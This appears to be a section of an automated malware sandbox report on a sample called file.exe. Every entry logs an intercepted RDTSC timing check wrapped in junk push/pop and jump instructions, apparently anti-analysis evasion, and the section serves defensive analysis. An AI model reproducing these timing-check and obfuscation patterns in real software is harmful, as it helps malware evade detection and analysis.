                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C359 second address: F4C35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C35D second address: F4C361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C361 second address: F4C36A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE88EF second address: FE8914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EEA4h 0x00000009 jnl 00007F49A854EE96h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE8BEA second address: FE8BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED155 second address: FED186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EEA6h 0x00000009 popad 0x0000000a jnl 00007F49A854EE9Eh 0x00000010 jne 00007F49A854EE9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1B1C second address: FF1B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1B20 second address: FF1B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1B24 second address: FF1B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A335h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F49A8F2A339h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1B5C second address: FF1B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA0h 0x00000007 jbe 00007F49A854EE96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1B76 second address: FF1B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1B7C second address: FF1B9D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F49A854EEA3h 0x0000000d jns 00007F49A854EE96h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1B9D second address: FF1BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF146A second address: FF146E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF15C7 second address: FF15CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF15CF second address: FF15DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF15DA second address: FF15E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FBB7 second address: F9FBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF68C7 second address: FF68DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F49A8F2A32Ch 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFD1FA second address: FFD1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDA4E second address: FFDA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F49A8F2A326h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDCD6 second address: FFDCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDCDA second address: FFDD06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F49A8F2A326h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnl 00007F49A8F2A326h 0x00000011 jmp 00007F49A8F2A333h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDD06 second address: FFDD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EE9Dh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F49A854EEA0h 0x00000012 jc 00007F49A854EE96h 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDFCD second address: FFDFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A335h 0x00000009 pop edi 0x0000000a jmp 00007F49A8F2A32Bh 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDFF2 second address: FFE018 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49A854EE9Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F49A854EEA6h 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE018 second address: FFE024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F49A8F2A326h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE024 second address: FFE028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE324 second address: FFE333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE333 second address: FFE344 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F49A854EE98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE344 second address: FFE348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEBC8 second address: FFEBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEBCE second address: FFEBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F49A8F2A32Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEBE5 second address: FFEBFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1002F9D second address: 1002FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003559 second address: 1003561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003561 second address: 100359B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F49A8F2A35Ah 0x0000000b pushad 0x0000000c jmp 00007F49A8F2A32Fh 0x00000011 jmp 00007F49A8F2A339h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003748 second address: 100374E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100374E second address: 1003754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003754 second address: 1003758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003758 second address: 1003784 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F49A8F2A326h 0x00000008 ja 00007F49A8F2A326h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F49A8F2A328h 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F49A8F2A32Ch 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003784 second address: 1003796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003A47 second address: 1003A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003A4D second address: 1003A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F49A854EE9Ch 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003A62 second address: 1003A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A332h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003A78 second address: 1003A81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003BDA second address: 1003BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F49A8F2A32Dh 0x0000000d jl 00007F49A8F2A326h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10088FC second address: 1008902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008902 second address: 100890C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F49A8F2A326h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100890C second address: 100893A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F49A854EEA4h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F8CF second address: 100F8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F49A8F2A332h 0x0000000b jo 00007F49A8F2A326h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FD31 second address: 100FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FD39 second address: 100FD3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FD3F second address: 100FD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FD45 second address: 100FD4F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F49A8F2A32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FEA2 second address: 100FEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FEA7 second address: 100FEB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F49A8F2A326h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FEB4 second address: 100FEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FEBD second address: 100FEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100FEC1 second address: 100FEC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010357 second address: 1010363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F49A8F2A326h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010363 second address: 1010369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010369 second address: 1010380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F49A8F2A336h 0x0000000b jmp 00007F49A8F2A32Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1010794 second address: 10107AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F49A854EE96h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d jnp 00007F49A854EE9Ah 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10107AB second address: 10107B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10107B2 second address: 10107D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F49A854EEA8h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10107D3 second address: 10107DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F49A8F2A326h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F4BD second address: 100F4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F49A854EEA2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F4D8 second address: 100F4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F4DC second address: 100F4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F4E0 second address: 100F4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017EE7 second address: 1017F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jno 00007F49A854EEA9h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F49A854EEA6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017F24 second address: 1017F31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F49A8F2A326h 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017F31 second address: 1017F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017F35 second address: 1017F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10179AB second address: 10179C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F49A854EE9Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1017B61 second address: 1017B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027047 second address: 102706F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EEA3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F49A854EE9Eh 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1026C05 second address: 1026C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1026C09 second address: 1026C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F49A854EE96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F49A854EEA4h 0x00000013 jmp 00007F49A854EE9Ah 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1026C35 second address: 1026C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1026C39 second address: 1026C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jp 00007F49A854EEB2h 0x0000000f ja 00007F49A854EE9Eh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10287C7 second address: 10287EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F49A8F2A33Ah 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10287EF second address: 1028808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028808 second address: 102880C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102880C second address: 1028816 instructions: 0x00000000 rdtsc 0x00000002 js 00007F49A854EE96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028816 second address: 1028822 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028822 second address: 1028839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A854EE9Bh 0x00000009 js 00007F49A854EE96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028839 second address: 1028843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B33C second address: 102B375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F49A854EE9Ch 0x00000010 pop edi 0x00000011 pushad 0x00000012 jmp 00007F49A854EEA5h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10316B4 second address: 10316C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F49A8F2A332h 0x0000000b jnp 00007F49A8F2A326h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10316C7 second address: 10316CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AFD9 second address: 103B016 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49A8F2A326h 0x00000008 jmp 00007F49A8F2A338h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F49A8F2A339h 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B016 second address: 103B01A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103B01A second address: 103B020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103AE88 second address: 103AE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C5D0 second address: 103C5D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C5D6 second address: 103C5DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
